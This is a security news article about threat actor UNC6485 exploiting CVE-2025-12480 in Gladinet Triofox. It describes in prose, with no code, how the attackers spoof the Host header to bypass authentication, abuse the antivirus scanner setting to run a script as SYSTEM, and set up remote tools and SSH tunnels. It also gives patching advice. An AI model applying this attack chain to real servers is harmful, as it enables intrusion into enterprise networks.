A newly uncovered cyberattack targeting Gladinet’s Triofox file-sharing and remote-access platform has highlighted just how quickly threat actors can turn legitimate security features into powerful intrusion tools. According to fresh research from Google’s Threat Intelligence Group (GTIG) and Mandiant, a threat cluster tracked as UNC6485 has been exploiting a critical flaw—CVE-2025-12480—in Triofox to achieve remote code execution with SYSTEM privileges, enabling deep access into enterprise environments.
The vulnerability stems from a logic flaw in access control, where the platform grants admin privileges whenever a request appears to originate from “localhost.” Attackers can easily spoof this check by manipulating the HTTP Host header, allowing them to bypass authentication entirely. Mandiant warns that systems running default Triofox configurations, where the optional TrustedHostIp parameter is not configured, are especially exposed. A security patch addressing the flaw was included in version 16.7.10368.56560, though researchers stress that administrators should immediately update to version 16.10.10408.56683 released in October for full protection.
GTIG discovered the malicious activity on August 24, when UNC6485 targeted a Triofox server running an April build of the software. After bypassing authentication, the attackers accessed Triofox’s AdminDatabase.aspx setup page, created a rogue admin account named “Cluster Admin,” and leveraged the product’s built-in antivirus scanner configuration to gain code execution. By redirecting the scanner to a malicious script they had uploaded, the threat actors ensured the file executed under SYSTEM privileges, giving them full control.
Once inside, the attackers deployed a batch script designed to launch a PowerShell downloader, which fetched a Zoho UEMS installer. From there, the attackers installed Zoho Assist and AnyDesk to maintain persistent remote access. They also introduced Plink and PuTTY to create SSH tunnels that forwarded traffic straight to the compromised host’s RDP port (3389), enabling stealthy lateral movement across the network.
Post-exploitation analysis revealed classic tradecraft: privilege escalation, remote tool deployment, and covert tunneling. GTIG’s report includes an extensive list of Indicators of Compromise (IoCs) that administrators should monitor immediately. The broader context is troubling—just last month, Huntress warned that attackers were exploiting another Gladinet zero-day (CVE-2025-11371) affecting Triofox and CentreStack products.
Conclusion:
The Triofox incident underscores how quickly cybercriminals exploit weak authentication flows and misconfigured security features. Organizations using Triofox must patch without delay, review all admin accounts, and audit their antivirus engine paths to ensure no unauthorized scripts are executed. As attackers increasingly blend zero-day exploitation with endpoint management tools and tunneling utilities, proactive monitoring and rapid patching remain critical defenses against modern intrusion campaigns.
